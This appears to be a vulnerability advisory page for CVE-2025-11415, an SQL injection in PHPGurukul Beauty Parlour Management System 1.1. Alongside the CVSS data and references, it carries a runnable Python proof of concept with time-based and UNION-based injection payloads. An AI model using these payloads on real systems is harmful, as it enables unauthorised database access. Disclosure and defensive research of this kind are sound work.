CVE-2025-11415

Description

A vulnerability was identified in PHPGurukul Beauty Parlour Management System 1.1. Affected by this issue is some unknown functionality of the file /admin/customer-list.php. Such manipulation of the argument delid leads to sql injection. It is possible to launch the attack remotely. The exploit is publicly available and might be used.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:phpgurukul:beauty_parlour_management_system:1.1:*:*:*:*:*:*:* - VULNERABLE

PHPGurukul Beauty Parlour Management System 1.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-11415 PoC - SQL Injection in PHPGurukul Beauty Parlour Management System 1.1
# Vulnerable file: /admin/customer-list.php
# Vulnerable parameter: delid

import requests
import sys

TARGET_URL = "http://target.com"  # Replace with actual target
VULNERABLE_PATH = "/admin/customer-list.php"

# Normal request to verify the endpoint is accessible
def check_vulnerable(base_url):
    url = base_url + VULNERABLE_PATH
    # Test for SQL injection using time-based blind technique
    payload_normal = {"delid": "1"}
    payload_inject = {"delid": "1' AND SLEEP(5)-- -"}

    try:
        # Send normal request
        r1 = requests.get(url, params=payload_normal, timeout=10)
        # Send injection request (should take longer due to SLEEP)
        r2 = requests.get(url, params=payload_inject, timeout=15)

        if r2.elapsed.total_seconds() - r1.elapsed.total_seconds() >= 4:
            print("[+] Target appears vulnerable to SQL injection!")
            return True
        else:
            print("[-] Target does not appear vulnerable.")
            return False
    except Exception as e:
        print(f"[!] Error: {e}")
        return False

# Extract data using UNION-based injection
def extract_data(base_url):
    url = base_url + VULNERABLE_PATH
    # Example UNION-based payload to extract database version
    # Adjust column count based on actual query structure
    payload = {
        "delid": "-1' UNION SELECT 1,version(),database(),user(),5,6,7,8,9,10-- -"
    }
    try:
        r = requests.get(url, params=payload, timeout=10)
        print("[+] Response:")
        print(r.text)
    except Exception as e:
        print(f"[!] Error: {e}")

if __name__ == "__main__":
    if len(sys.argv) > 1:
        TARGET_URL = sys.argv[1]
    if check_vulnerable(TARGET_URL):
        extract_data(TARGET_URL)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-11415
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-11415
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-11415/
[4] VulDB https://vuldb.com/cve/CVE-2025-11415
[5] https://github.com/f000x0/cve/issues/3
[6] https://phpgurukul.com/
[7] https://vuldb.com/?ctiid.327351
[8] https://vuldb.com/?id.327351
[9] https://vuldb.com/?submit.665594
[10] https://github.com/f000x0/cve/issues/3

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-11415", "sourceIdentifier": "[email protected]", "published": "2025-10-07T23:15:33.243", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was identified in PHPGurukul Beauty Parlour Management System 1.1. Affected by this issue is some unknown functionality of the file /admin/customer-list.php. Such manipulation of the argument delid leads to sql injection. It is possible to launch the attack remotely. The exploit is publicly available and might be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:phpgurukul:beauty_parlour_management_system:1.1:*:*:*:*:*:*:*", "matchCriteriaId": "A0663F5C-7E50-4432-817D-518802751580"}]}]}], "references": [{"url": "https://github.com/f000x0/cve/issues/3", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://phpgurukul.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://vuldb.com/?ctiid.327351", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327351", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.665594", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://github.com/f000x0/cve/issues/3", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking"]}]}}